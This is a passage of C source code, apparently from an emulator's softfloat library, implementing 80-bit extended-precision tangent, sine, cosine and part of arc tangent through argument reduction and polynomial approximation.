UINT64_C(0xC0219DC1DA994FD2)); fp2 = floatx80_mul(fp2, fp3, status); /* N*(LOG2/64LOG10)_TRAIL */ fp0 = floatx80_sub(fp0, fp1, status); /* X - N L_LEAD */ fp0 = floatx80_sub(fp0, fp2, status); /* X - N L_TRAIL */ fp2 = packFloatx80(0, 0x4000, UINT64_C(0x935D8DDDAAA8AC17)); /* LOG10 */ fp0 = floatx80_mul(fp0, fp2, status); /* R */ /* EXPR */ fp1 = floatx80_mul(fp0, fp0, status); /* S = R*R */ fp2 = float64_to_floatx80(make_float64(0x3F56C16D6F7BD0B2), status); /* A5 */ fp3 = float64_to_floatx80(make_float64(0x3F811112302C712C), status); /* A4 */ fp2 = floatx80_mul(fp2, fp1, status); /* S*A5 */ fp3 = floatx80_mul(fp3, fp1, status); /* S*A4 */ fp2 = floatx80_add(fp2, float64_to_floatx80( make_float64(0x3FA5555555554CC1), status), status); /* A3+S*A5 */ fp3 = floatx80_add(fp3, float64_to_floatx80( make_float64(0x3FC5555555554A54), status), status); /* A2+S*A4 */ fp2 = floatx80_mul(fp2, fp1, status); /* S*(A3+S*A5) */ fp3 = floatx80_mul(fp3, fp1, status); /* S*(A2+S*A4) */ fp2 = floatx80_add(fp2, float64_to_floatx80( make_float64(0x3FE0000000000000), status), status); /* A1+S*(A3+S*A5) */ fp3 = floatx80_mul(fp3, fp0, status); /* R*S*(A2+S*A4) */ fp2 = floatx80_mul(fp2, fp1, status); /* S*(A1+S*(A3+S*A5)) */ fp0 = floatx80_add(fp0, fp3, status); /* R+R*S*(A2+S*A4) */ fp0 = floatx80_add(fp0, fp2, status); /* EXP(R) - 1 */ fp0 = floatx80_mul(fp0, fact1, status); fp0 = floatx80_add(fp0, fact2, status); fp0 = floatx80_add(fp0, fact1, status); status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_mul(fp0, adjfact, status); float_raise(float_flag_inexact, status); return a; } } /* * Tangent */ floatx80 floatx80_tan(floatx80 a, float_status *status) { flag aSign, xSign; int32_t aExp, xExp; uint64_t aSig, xSig; int8_t user_rnd_mode, user_rnd_prec; int32_t compact, l, n, j; floatx80 fp0, fp1, fp2, fp3, fp4, fp5, invtwopi, twopi1, twopi2; float32 twoto63; flag endflag; aSig = extractFloatx80Frac(a); aExp = extractFloatx80Exp(a); aSign = extractFloatx80Sign(a); if (aExp == 0x7FFF) { if ((uint64_t) (aSig << 1)) { return propagateFloatx80NaNOneArg(a, status); } float_raise(float_flag_invalid, status); return floatx80_default_nan(status); } if (aExp == 0 && aSig == 0) { return packFloatx80(aSign, 0, 0); } user_rnd_mode = status->float_rounding_mode; user_rnd_prec = status->floatx80_rounding_precision; status->float_rounding_mode = float_round_nearest_even; status->floatx80_rounding_precision = 80; compact = floatx80_make_compact(aExp, aSig); fp0 = a; if (compact < 0x3FD78000 || compact > 0x4004BC7E) { /* 2^(-40) > |X| > 15 PI */ if (compact > 0x3FFF8000) { /* |X| >= 15 PI */ /* REDUCEX */ fp1 = packFloatx80(0, 0, 0); if (compact == 0x7FFEFFFF) { twopi1 = packFloatx80(aSign ^ 1, 0x7FFE, UINT64_C(0xC90FDAA200000000)); twopi2 = packFloatx80(aSign ^ 1, 0x7FDC, UINT64_C(0x85A308D300000000)); fp0 = floatx80_add(fp0, twopi1, status); fp1 = fp0; fp0 = floatx80_add(fp0, twopi2, status); fp1 = floatx80_sub(fp1, fp0, status); fp1 = floatx80_add(fp1, twopi2, status); } loop: xSign = extractFloatx80Sign(fp0); xExp = extractFloatx80Exp(fp0); xExp -= 0x3FFF; if (xExp <= 28) { l = 0; endflag = 1; } else { l = xExp - 27; endflag = 0; } invtwopi = packFloatx80(0, 0x3FFE - l, UINT64_C(0xA2F9836E4E44152A)); /* INVTWOPI */ twopi1 = packFloatx80(0, 0x3FFF + l, UINT64_C(0xC90FDAA200000000)); twopi2 = packFloatx80(0, 0x3FDD + l, UINT64_C(0x85A308D300000000)); /* SIGN(INARG)*2^63 IN SGL */ twoto63 = packFloat32(xSign, 0xBE, 0); fp2 = floatx80_mul(fp0, invtwopi, status); fp2 = floatx80_add(fp2, float32_to_floatx80(twoto63, status), status); /* THE FRACT PART OF FP2 IS ROUNDED */ fp2 = floatx80_sub(fp2, float32_to_floatx80(twoto63, status), status); /* FP2 is N */ fp4 = floatx80_mul(twopi1, fp2, status); /* W = N*P1 */ fp5 = floatx80_mul(twopi2, fp2, status); /* w = N*P2 */ fp3 = floatx80_add(fp4, fp5, status); /* FP3 is P */ fp4 = floatx80_sub(fp4, fp3, status); /* W-P */ fp0 = floatx80_sub(fp0, fp3, status); /* FP0 is A := R - P */ fp4 = floatx80_add(fp4, fp5, status); /* FP4 is p = (W-P)+w */ fp3 = fp0; /* FP3 is A */ fp1 = floatx80_sub(fp1, fp4, status); /* FP1 is a := r - p */ fp0 = floatx80_add(fp0, fp1, status); /* FP0 is R := A+a */ if (endflag > 0) { n = floatx80_to_int32(fp2, status); goto tancont; } fp3 = floatx80_sub(fp3, fp0, status); /* A-R */ fp1 = floatx80_add(fp1, fp3, status); /* FP1 is r := (A-R)+a */ goto loop; } else { status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_move(a, status); float_raise(float_flag_inexact, status); return a; } } else { fp1 = floatx80_mul(fp0, float64_to_floatx80( make_float64(0x3FE45F306DC9C883), status), status); /* X*2/PI */ n = floatx80_to_int32(fp1, status); j = 32 + n; fp0 = floatx80_sub(fp0, pi_tbl[j], status); /* X-Y1 */ fp0 = floatx80_sub(fp0, float32_to_floatx80(pi_tbl2[j], status), status); /* FP0 IS R = (X-Y1)-Y2 */ tancont: if (n & 1) { /* NODD */ fp1 = fp0; /* R */ fp0 = floatx80_mul(fp0, fp0, status); /* S = R*R */ fp3 = float64_to_floatx80(make_float64(0x3EA0B759F50F8688), status); /* Q4 */ fp2 = float64_to_floatx80(make_float64(0xBEF2BAA5A8924F04), status); /* P3 */ fp3 = floatx80_mul(fp3, fp0, status); /* SQ4 */ fp2 = floatx80_mul(fp2, fp0, status); /* SP3 */ fp3 = floatx80_add(fp3, float64_to_floatx80( make_float64(0xBF346F59B39BA65F), status), status); /* Q3+SQ4 */ fp4 = packFloatx80(0, 0x3FF6, UINT64_C(0xE073D3FC199C4A00)); fp2 = floatx80_add(fp2, fp4, status); /* P2+SP3 */ fp3 = floatx80_mul(fp3, fp0, status); /* S(Q3+SQ4) */ fp2 = floatx80_mul(fp2, fp0, status); /* S(P2+SP3) */ fp4 = packFloatx80(0, 0x3FF9, UINT64_C(0xD23CD68415D95FA1)); fp3 = floatx80_add(fp3, fp4, status); /* Q2+S(Q3+SQ4) */ fp4 = packFloatx80(1, 0x3FFC, UINT64_C(0x8895A6C5FB423BCA)); fp2 = floatx80_add(fp2, fp4, status); /* P1+S(P2+SP3) */ fp3 = floatx80_mul(fp3, fp0, status); /* S(Q2+S(Q3+SQ4)) */ fp2 = floatx80_mul(fp2, fp0, status); /* S(P1+S(P2+SP3)) */ fp4 = packFloatx80(1, 0x3FFD, UINT64_C(0xEEF57E0DA84BC8CE)); fp3 = floatx80_add(fp3, fp4, status); /* Q1+S(Q2+S(Q3+SQ4)) */ fp2 = floatx80_mul(fp2, fp1, status); /* RS(P1+S(P2+SP3)) */ fp0 = floatx80_mul(fp0, fp3, status); /* S(Q1+S(Q2+S(Q3+SQ4))) */ fp1 = floatx80_add(fp1, fp2, status); /* R+RS(P1+S(P2+SP3)) */ fp0 = floatx80_add(fp0, float32_to_floatx80( make_float32(0x3F800000), status), status); /* 1+S(Q1+S(Q2+S(Q3+SQ4))) */ xSign = extractFloatx80Sign(fp1); xExp = extractFloatx80Exp(fp1); xSig = extractFloatx80Frac(fp1); xSign ^= 1; fp1 = packFloatx80(xSign, xExp, xSig); status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_div(fp0, fp1, status); float_raise(float_flag_inexact, status); return a; } else { fp1 = floatx80_mul(fp0, fp0, status); /* S = R*R */ fp3 = float64_to_floatx80(make_float64(0x3EA0B759F50F8688), status); /* Q4 */ fp2 = float64_to_floatx80(make_float64(0xBEF2BAA5A8924F04), status); /* P3 */ fp3 = floatx80_mul(fp3, fp1, status); /* SQ4 */ fp2 = floatx80_mul(fp2, fp1, status); /* SP3 */ fp3 = floatx80_add(fp3, float64_to_floatx80( make_float64(0xBF346F59B39BA65F), status), status); /* Q3+SQ4 */ fp4 = packFloatx80(0, 0x3FF6, UINT64_C(0xE073D3FC199C4A00)); fp2 = floatx80_add(fp2, fp4, status); /* P2+SP3 */ fp3 = floatx80_mul(fp3, fp1, status); /* S(Q3+SQ4) */ fp2 = floatx80_mul(fp2, fp1, status); /* S(P2+SP3) */ fp4 = packFloatx80(0, 0x3FF9, UINT64_C(0xD23CD68415D95FA1)); fp3 = floatx80_add(fp3, fp4, status); /* Q2+S(Q3+SQ4) */ fp4 = packFloatx80(1, 0x3FFC, UINT64_C(0x8895A6C5FB423BCA)); fp2 = floatx80_add(fp2, fp4, status); /* P1+S(P2+SP3) */ fp3 = floatx80_mul(fp3, fp1, status); /* S(Q2+S(Q3+SQ4)) */ fp2 = floatx80_mul(fp2, fp1, status); /* S(P1+S(P2+SP3)) */ fp4 = packFloatx80(1, 0x3FFD, UINT64_C(0xEEF57E0DA84BC8CE)); fp3 = floatx80_add(fp3, fp4, status); /* Q1+S(Q2+S(Q3+SQ4)) */ fp2 = floatx80_mul(fp2, fp0, status); /* RS(P1+S(P2+SP3)) */ fp1 = floatx80_mul(fp1, fp3, status); /* S(Q1+S(Q2+S(Q3+SQ4))) */ fp0 = floatx80_add(fp0, fp2, status); /* R+RS(P1+S(P2+SP3)) */ fp1 = floatx80_add(fp1, float32_to_floatx80( make_float32(0x3F800000), status), status); /* 1+S(Q1+S(Q2+S(Q3+SQ4))) */ status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_div(fp0, fp1, status); float_raise(float_flag_inexact, status); return a; } } } /* * Sine */ floatx80 floatx80_sin(floatx80 a, float_status *status) { flag aSign, xSign; int32_t aExp, xExp; uint64_t aSig, xSig; int8_t user_rnd_mode, user_rnd_prec; int32_t compact, l, n, j; floatx80 fp0, fp1, fp2, fp3, fp4, fp5, x, invtwopi, twopi1, twopi2; float32 posneg1, twoto63; flag endflag; aSig = extractFloatx80Frac(a); aExp = extractFloatx80Exp(a); aSign = extractFloatx80Sign(a); if (aExp == 0x7FFF) { if ((uint64_t) (aSig << 1)) { return propagateFloatx80NaNOneArg(a, status); } float_raise(float_flag_invalid, status); return floatx80_default_nan(status); } if (aExp == 0 && aSig == 0) { return packFloatx80(aSign, 0, 0); } user_rnd_mode = status->float_rounding_mode; user_rnd_prec = status->floatx80_rounding_precision; status->float_rounding_mode = float_round_nearest_even; status->floatx80_rounding_precision = 80; compact = floatx80_make_compact(aExp, aSig); fp0 = a; if (compact < 0x3FD78000 || compact > 0x4004BC7E) { /* 2^(-40) > |X| > 15 PI */ if (compact > 0x3FFF8000) { /* |X| >= 15 PI */ /* REDUCEX */ fp1 = packFloatx80(0, 0, 0); if (compact == 0x7FFEFFFF) { twopi1 = packFloatx80(aSign ^ 1, 0x7FFE, UINT64_C(0xC90FDAA200000000)); twopi2 = packFloatx80(aSign ^ 1, 0x7FDC, UINT64_C(0x85A308D300000000)); fp0 = floatx80_add(fp0, twopi1, status); fp1 = fp0; fp0 = floatx80_add(fp0, twopi2, status); fp1 = floatx80_sub(fp1, fp0, status); fp1 = floatx80_add(fp1, twopi2, status); } loop: xSign = extractFloatx80Sign(fp0); xExp = extractFloatx80Exp(fp0); xExp -= 0x3FFF; if (xExp <= 28) { l = 0; endflag = 1; } else { l = xExp - 27; endflag = 0; } invtwopi = packFloatx80(0, 0x3FFE - l, UINT64_C(0xA2F9836E4E44152A)); /* INVTWOPI */ twopi1 = packFloatx80(0, 0x3FFF + l, UINT64_C(0xC90FDAA200000000)); twopi2 = packFloatx80(0, 0x3FDD + l, UINT64_C(0x85A308D300000000)); /* SIGN(INARG)*2^63 IN SGL */ twoto63 = packFloat32(xSign, 0xBE, 0); fp2 = floatx80_mul(fp0, invtwopi, status); fp2 = floatx80_add(fp2, float32_to_floatx80(twoto63, status), status); /* THE FRACT PART OF FP2 IS ROUNDED */ fp2 = floatx80_sub(fp2, float32_to_floatx80(twoto63, status), status); /* FP2 is N */ fp4 = floatx80_mul(twopi1, fp2, status); /* W = N*P1 */ fp5 = floatx80_mul(twopi2, fp2, status); /* w = N*P2 */ fp3 = floatx80_add(fp4, fp5, status); /* FP3 is P */ fp4 = floatx80_sub(fp4, fp3, status); /* W-P */ fp0 = floatx80_sub(fp0, fp3, status); /* FP0 is A := R - P */ fp4 = floatx80_add(fp4, fp5, status); /* FP4 is p = (W-P)+w */ fp3 = fp0; /* FP3 is A */ fp1 = floatx80_sub(fp1, fp4, status); /* FP1 is a := r - p */ fp0 = floatx80_add(fp0, fp1, status); /* FP0 is R := A+a */ if (endflag > 0) { n = floatx80_to_int32(fp2, status); goto sincont; } fp3 = floatx80_sub(fp3, fp0, status); /* A-R */ fp1 = floatx80_add(fp1, fp3, status); /* FP1 is r := (A-R)+a */ goto loop; } else { /* SINSM */ fp0 = float32_to_floatx80(make_float32(0x3F800000), status); /* 1 */ status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; /* SINTINY */ a = floatx80_move(a, status); float_raise(float_flag_inexact, status); return a; } } else { fp1 = floatx80_mul(fp0, float64_to_floatx80( make_float64(0x3FE45F306DC9C883), status), status); /* X*2/PI */ n = floatx80_to_int32(fp1, status); j = 32 + n; fp0 = floatx80_sub(fp0, pi_tbl[j], status); /* X-Y1 */ fp0 = floatx80_sub(fp0, float32_to_floatx80(pi_tbl2[j], status), status); /* FP0 IS R = (X-Y1)-Y2 */ sincont: if (n & 1) { /* COSPOLY */ fp0 = floatx80_mul(fp0, fp0, status); /* FP0 IS S */ fp1 = floatx80_mul(fp0, fp0, status); /* FP1 IS T */ fp2 = float64_to_floatx80(make_float64(0x3D2AC4D0D6011EE3), status); /* B8 */ fp3 = float64_to_floatx80(make_float64(0xBDA9396F9F45AC19), status); /* B7 */ xSign = extractFloatx80Sign(fp0); /* X IS S */ xExp = extractFloatx80Exp(fp0); xSig = extractFloatx80Frac(fp0); if ((n >> 1) & 1) { xSign ^= 1; posneg1 = make_float32(0xBF800000); /* -1 */ } else { xSign ^= 0; posneg1 = make_float32(0x3F800000); /* 1 */ } /* X IS NOW R'= SGN*R */ fp2 = floatx80_mul(fp2, fp1, status); /* TB8 */ fp3 = floatx80_mul(fp3, fp1, status); /* TB7 */ fp2 = floatx80_add(fp2, float64_to_floatx80( make_float64(0x3E21EED90612C972), status), status); /* B6+TB8 */ fp3 = floatx80_add(fp3, float64_to_floatx80( make_float64(0xBE927E4FB79D9FCF), status), status); /* B5+TB7 */ fp2 = floatx80_mul(fp2, fp1, status); /* T(B6+TB8) */ fp3 = floatx80_mul(fp3, fp1, status); /* T(B5+TB7) */ fp2 = floatx80_add(fp2, float64_to_floatx80( make_float64(0x3EFA01A01A01D423), status), status); /* B4+T(B6+TB8) */ fp4 = packFloatx80(1, 0x3FF5, UINT64_C(0xB60B60B60B61D438)); fp3 = floatx80_add(fp3, fp4, status); /* B3+T(B5+TB7) */ fp2 = floatx80_mul(fp2, fp1, status); /* T(B4+T(B6+TB8)) */ fp1 = floatx80_mul(fp1, fp3, status); /* T(B3+T(B5+TB7)) */ fp4 = packFloatx80(0, 0x3FFA, UINT64_C(0xAAAAAAAAAAAAAB5E)); fp2 = floatx80_add(fp2, fp4, status); /* B2+T(B4+T(B6+TB8)) */ fp1 = floatx80_add(fp1, float32_to_floatx80( make_float32(0xBF000000), status), status); /* B1+T(B3+T(B5+TB7)) */ fp0 = floatx80_mul(fp0, fp2, status); /* S(B2+T(B4+T(B6+TB8))) */ fp0 = floatx80_add(fp0, fp1, status); /* [B1+T(B3+T(B5+TB7))]+ * [S(B2+T(B4+T(B6+TB8)))] */ x = packFloatx80(xSign, xExp, xSig); fp0 = floatx80_mul(fp0, x, status); status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_add(fp0, float32_to_floatx80(posneg1, status), status); float_raise(float_flag_inexact, status); return a; } else { /* SINPOLY */ xSign = extractFloatx80Sign(fp0); /* X IS R */ xExp = extractFloatx80Exp(fp0); xSig = extractFloatx80Frac(fp0); xSign ^= (n >> 1) & 1; /* X IS NOW R'= SGN*R */ fp0 = floatx80_mul(fp0, fp0, status); /* FP0 IS S */ fp1 = floatx80_mul(fp0, fp0, status); /* FP1 IS T */ fp3 = float64_to_floatx80(make_float64(0xBD6AAA77CCC994F5), status); /* A7 */ fp2 = float64_to_floatx80(make_float64(0x3DE612097AAE8DA1), status); /* A6 */ fp3 = floatx80_mul(fp3, fp1, status); /* T*A7 */ fp2 = floatx80_mul(fp2, fp1, status); /* T*A6 */ fp3 = floatx80_add(fp3, float64_to_floatx80( make_float64(0xBE5AE6452A118AE4), status), status); /* A5+T*A7 */ fp2 = floatx80_add(fp2, float64_to_floatx80( make_float64(0x3EC71DE3A5341531), status), status); /* A4+T*A6 */ fp3 = floatx80_mul(fp3, fp1, status); /* T(A5+TA7) */ fp2 = floatx80_mul(fp2, fp1, status); /* T(A4+TA6) */ fp3 = floatx80_add(fp3, float64_to_floatx80( make_float64(0xBF2A01A01A018B59), status), status); /* A3+T(A5+TA7) */ fp4 = packFloatx80(0, 0x3FF8, UINT64_C(0x88888888888859AF)); fp2 = floatx80_add(fp2, fp4, status); /* A2+T(A4+TA6) */ fp1 = floatx80_mul(fp1, fp3, status); /* T(A3+T(A5+TA7)) */ fp2 = floatx80_mul(fp2, fp0, status); /* S(A2+T(A4+TA6)) */ fp4 = packFloatx80(1, 0x3FFC, UINT64_C(0xAAAAAAAAAAAAAA99)); fp1 = floatx80_add(fp1, fp4, status); /* A1+T(A3+T(A5+TA7)) */ fp1 = floatx80_add(fp1, fp2, status); /* [A1+T(A3+T(A5+TA7))]+ * [S(A2+T(A4+TA6))] */ x = packFloatx80(xSign, xExp, xSig); fp0 = floatx80_mul(fp0, x, status); /* R'*S */ fp0 = floatx80_mul(fp0, fp1, status); /* SIN(R')-R' */ status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_add(fp0, x, status); float_raise(float_flag_inexact, status); return a; } } } /* * Cosine */ floatx80 floatx80_cos(floatx80 a, float_status *status) { flag aSign, xSign; int32_t aExp, xExp; uint64_t aSig, xSig; int8_t user_rnd_mode, user_rnd_prec; int32_t compact, l, n, j; floatx80 fp0, fp1, fp2, fp3, fp4, fp5, x, invtwopi, twopi1, twopi2; float32 posneg1, twoto63; flag endflag; aSig = extractFloatx80Frac(a); aExp = extractFloatx80Exp(a); aSign = extractFloatx80Sign(a); if (aExp == 0x7FFF) { if ((uint64_t) (aSig << 1)) { return propagateFloatx80NaNOneArg(a, status); } float_raise(float_flag_invalid, status); return floatx80_default_nan(status); } if (aExp == 0 && aSig == 0) { return packFloatx80(0, one_exp, one_sig); } user_rnd_mode = status->float_rounding_mode; user_rnd_prec = status->floatx80_rounding_precision; status->float_rounding_mode = float_round_nearest_even; status->floatx80_rounding_precision = 80; compact = floatx80_make_compact(aExp, aSig); fp0 = a; if (compact < 0x3FD78000 || compact > 0x4004BC7E) { /* 2^(-40) > |X| > 15 PI */ if (compact > 0x3FFF8000) { /* |X| >= 15 PI */ /* REDUCEX */ fp1 = packFloatx80(0, 0, 0); if (compact == 0x7FFEFFFF) { twopi1 = packFloatx80(aSign ^ 1, 0x7FFE, UINT64_C(0xC90FDAA200000000)); twopi2 = packFloatx80(aSign ^ 1, 0x7FDC, UINT64_C(0x85A308D300000000)); fp0 = floatx80_add(fp0, twopi1, status); fp1 = fp0; fp0 = floatx80_add(fp0, twopi2, status); fp1 = floatx80_sub(fp1, fp0, status); fp1 = floatx80_add(fp1, twopi2, status); } loop: xSign = extractFloatx80Sign(fp0); xExp = extractFloatx80Exp(fp0); xExp -= 0x3FFF; if (xExp <= 28) { l = 0; endflag = 1; } else { l = xExp - 27; endflag = 0; } invtwopi = packFloatx80(0, 0x3FFE - l, UINT64_C(0xA2F9836E4E44152A)); /* INVTWOPI */ twopi1 = packFloatx80(0, 0x3FFF + l, UINT64_C(0xC90FDAA200000000)); twopi2 = packFloatx80(0, 0x3FDD + l, UINT64_C(0x85A308D300000000)); /* SIGN(INARG)*2^63 IN SGL */ twoto63 = packFloat32(xSign, 0xBE, 0); fp2 = floatx80_mul(fp0, invtwopi, status); fp2 = floatx80_add(fp2, float32_to_floatx80(twoto63, status), status); /* THE FRACT PART OF FP2 IS ROUNDED */ fp2 = floatx80_sub(fp2, float32_to_floatx80(twoto63, status), status); /* FP2 is N */ fp4 = floatx80_mul(twopi1, fp2, status); /* W = N*P1 */ fp5 = floatx80_mul(twopi2, fp2, status); /* w = N*P2 */ fp3 = floatx80_add(fp4, fp5, status); /* FP3 is P */ fp4 = floatx80_sub(fp4, fp3, status); /* W-P */ fp0 = floatx80_sub(fp0, fp3, status); /* FP0 is A := R - P */ fp4 = floatx80_add(fp4, fp5, status); /* FP4 is p = (W-P)+w */ fp3 = fp0; /* FP3 is A */ fp1 = floatx80_sub(fp1, fp4, status); /* FP1 is a := r - p */ fp0 = floatx80_add(fp0, fp1, status); /* FP0 is R := A+a */ if (endflag > 0) { n = floatx80_to_int32(fp2, status); goto sincont; } fp3 = floatx80_sub(fp3, fp0, status); /* A-R */ fp1 = floatx80_add(fp1, fp3, status); /* FP1 is r := (A-R)+a */ goto loop; } else { /* SINSM */ fp0 = float32_to_floatx80(make_float32(0x3F800000), status); /* 1 */ status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; /* COSTINY */ a = floatx80_sub(fp0, float32_to_floatx80( make_float32(0x00800000), status), status); float_raise(float_flag_inexact, status); return a; } } else { fp1 = floatx80_mul(fp0, float64_to_floatx80( make_float64(0x3FE45F306DC9C883), status), status); /* X*2/PI */ n = floatx80_to_int32(fp1, status); j = 32 + n; fp0 = floatx80_sub(fp0, pi_tbl[j], status); /* X-Y1 */ fp0 = floatx80_sub(fp0, float32_to_floatx80(pi_tbl2[j], status), status); /* FP0 IS R = (X-Y1)-Y2 */ sincont: if ((n + 1) & 1) { /* COSPOLY */ fp0 = floatx80_mul(fp0, fp0, status); /* FP0 IS S */ fp1 = floatx80_mul(fp0, fp0, status); /* FP1 IS T */ fp2 = float64_to_floatx80(make_float64(0x3D2AC4D0D6011EE3), status); /* B8 */ fp3 = float64_to_floatx80(make_float64(0xBDA9396F9F45AC19), status); /* B7 */ xSign = extractFloatx80Sign(fp0); /* X IS S */ xExp = extractFloatx80Exp(fp0); xSig = extractFloatx80Frac(fp0); if (((n + 1) >> 1) & 1) { xSign ^= 1; posneg1 = make_float32(0xBF800000); /* -1 */ } else { xSign ^= 0; posneg1 = make_float32(0x3F800000); /* 1 */ } /* X IS NOW R'= SGN*R */ fp2 = floatx80_mul(fp2, fp1, status); /* TB8 */ fp3 = floatx80_mul(fp3, fp1, status); /* TB7 */ fp2 = floatx80_add(fp2, float64_to_floatx80( make_float64(0x3E21EED90612C972), status), status); /* B6+TB8 */ fp3 = floatx80_add(fp3, float64_to_floatx80( make_float64(0xBE927E4FB79D9FCF), status), status); /* B5+TB7 */ fp2 = floatx80_mul(fp2, fp1, status); /* T(B6+TB8) */ fp3 = floatx80_mul(fp3, fp1, status); /* T(B5+TB7) */ fp2 = floatx80_add(fp2, float64_to_floatx80( make_float64(0x3EFA01A01A01D423), status), status); /* B4+T(B6+TB8) */ fp4 = packFloatx80(1, 0x3FF5, UINT64_C(0xB60B60B60B61D438)); fp3 = floatx80_add(fp3, fp4, status); /* B3+T(B5+TB7) */ fp2 = floatx80_mul(fp2, fp1, status); /* T(B4+T(B6+TB8)) */ fp1 = floatx80_mul(fp1, fp3, status); /* T(B3+T(B5+TB7)) */ fp4 = packFloatx80(0, 0x3FFA, UINT64_C(0xAAAAAAAAAAAAAB5E)); fp2 = floatx80_add(fp2, fp4, status); /* B2+T(B4+T(B6+TB8)) */ fp1 = floatx80_add(fp1, float32_to_floatx80( make_float32(0xBF000000), status), status); /* B1+T(B3+T(B5+TB7)) */ fp0 = floatx80_mul(fp0, fp2, status); /* S(B2+T(B4+T(B6+TB8))) */ fp0 = floatx80_add(fp0, fp1, status); /* [B1+T(B3+T(B5+TB7))]+[S(B2+T(B4+T(B6+TB8)))] */ x = packFloatx80(xSign, xExp, xSig); fp0 = floatx80_mul(fp0, x, status); status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_add(fp0, float32_to_floatx80(posneg1, status), status); float_raise(float_flag_inexact, status); return a; } else { /* SINPOLY */ xSign = extractFloatx80Sign(fp0); /* X IS R */ xExp = extractFloatx80Exp(fp0); xSig = extractFloatx80Frac(fp0); xSign ^= ((n + 1) >> 1) & 1; /* X IS NOW R'= SGN*R */ fp0 = floatx80_mul(fp0, fp0, status); /* FP0 IS S */ fp1 = floatx80_mul(fp0, fp0, status); /* FP1 IS T */ fp3 = float64_to_floatx80(make_float64(0xBD6AAA77CCC994F5), status); /* A7 */ fp2 = float64_to_floatx80(make_float64(0x3DE612097AAE8DA1), status); /* A6 */ fp3 = floatx80_mul(fp3, fp1, status); /* T*A7 */ fp2 = floatx80_mul(fp2, fp1, status); /* T*A6 */ fp3 = floatx80_add(fp3, float64_to_floatx80( make_float64(0xBE5AE6452A118AE4), status), status); /* A5+T*A7 */ fp2 = floatx80_add(fp2, float64_to_floatx80( make_float64(0x3EC71DE3A5341531), status), status); /* A4+T*A6 */ fp3 = floatx80_mul(fp3, fp1, status); /* T(A5+TA7) */ fp2 = floatx80_mul(fp2, fp1, status); /* T(A4+TA6) */ fp3 = floatx80_add(fp3, float64_to_floatx80( make_float64(0xBF2A01A01A018B59), status), status); /* A3+T(A5+TA7) */ fp4 = packFloatx80(0, 0x3FF8, UINT64_C(0x88888888888859AF)); fp2 = floatx80_add(fp2, fp4, status); /* A2+T(A4+TA6) */ fp1 = floatx80_mul(fp1, fp3, status); /* T(A3+T(A5+TA7)) */ fp2 = floatx80_mul(fp2, fp0, status); /* S(A2+T(A4+TA6)) */ fp4 = packFloatx80(1, 0x3FFC, UINT64_C(0xAAAAAAAAAAAAAA99)); fp1 = floatx80_add(fp1, fp4, status); /* A1+T(A3+T(A5+TA7)) */ fp1 = floatx80_add(fp1, fp2, status); /* [A1+T(A3+T(A5+TA7))]+[S(A2+T(A4+TA6))] */ x = packFloatx80(xSign, xExp, xSig); fp0 = floatx80_mul(fp0, x, status); /* R'*S */ fp0 = floatx80_mul(fp0, fp1, status); /* SIN(R')-R' */ status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_add(fp0, x, status); float_raise(float_flag_inexact, status); return a; } } } /* * Arc tangent */ floatx80 floatx80_atan(floatx80 a, float_status *status) { flag aSign; int32_t aExp; uint64_t aSig; int8_t user_rnd_mode, user_rnd_prec; int32_t compact, tbl_index; floatx80 fp0, fp1, fp2, fp3, xsave; aSig = extractFloatx80Frac(a); aExp = extractFloatx80Exp(a); aSign = extractFloatx80Sign(a); if (aExp == 0x7FFF) { if ((uint64_t) (aSig << 1)) { return propagateFloatx80NaNOneArg(a, status); } a = packFloatx80(aSign, piby2_exp, pi_sig); float_raise(float_flag_inexact, status); return floatx80_move(a, status); } if (aExp == 0 && aSig == 0) { return packFloatx80(aSign, 0, 0); } compact = floatx80_make_compact(aExp, aSig); user_rnd_mode = status->float_rounding_mode; user_rnd_prec = status->floatx80_rounding_precision; status->float_rounding_mode = float_round_nearest_even; status->floatx80_rounding_precision = 80; if (compact < 0x3FFB8000 || compact > 0x4002FFFF) { /* |X| >= 16 or |X| < 1/16 */ if (compact > 0x3FFF8000) { /* |X| >= 16 */ if (compact > 0x40638000) { /* |X| > 2^(100) */ fp0 = packFloatx80(aSign, piby2_exp, pi_sig); fp1 = packFloatx80(aSign, 0x0001, one_sig); status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_sub(fp0, fp1, status); float_raise(float_flag_inexact, status); return a; } else { fp0 = a; fp1 = packFloatx80(1, one_exp, one_sig); /* -1 */ fp1 = floatx80_div(fp1, fp0, status); /* X' = -1/X */ xsave = fp1; fp0 = floatx80_mul(fp1, fp1, status); /* Y = X'*X' */ fp1 = floatx80_mul(fp0, fp0, status); /* Z = Y*Y */ fp3 = float64_to_floatx80(make_float64(0xBFB70BF398539E6A), status); /* C5 */ fp2 = float64_to_floatx80(make_float64(0x3FBC7187962D1D7D), status); /* C4 */ fp3 = floatx80_mul(fp3, fp1, status); /* Z*C5 */ fp2 = floatx80_mul(fp2, fp1, status); /* Z*C4 */ fp3 = floatx80_add(fp3, float64_to_floatx80( make_float64(0xBFC24924827107B8), status), status); /* C3+Z*C5 */ fp2 = floatx80_add(fp2, float64_to_floatx80( make_float64(0x3FC999999996263E), status), status); /* C2+Z*C4 */ fp1 = floatx80_mul(fp1, fp3, status); /* Z*(C3+Z*C5) */ fp2 = floatx80_mul(fp2, fp0, status); /* Y*(C2+Z*C4) */ fp1 = floatx80_add(fp1, float64_to_floatx80( make_float64(0xBFD5555555555536), status), status); /* C1+Z*(C3+Z*C5) */ fp0 = floatx80_mul(fp0, xsave, status); /* X'*Y */ /* [Y*(C2+Z*C4)]+[C1+Z*(C3+Z*C5)] */ fp1 = floatx80_add(fp1, fp2, status); /* 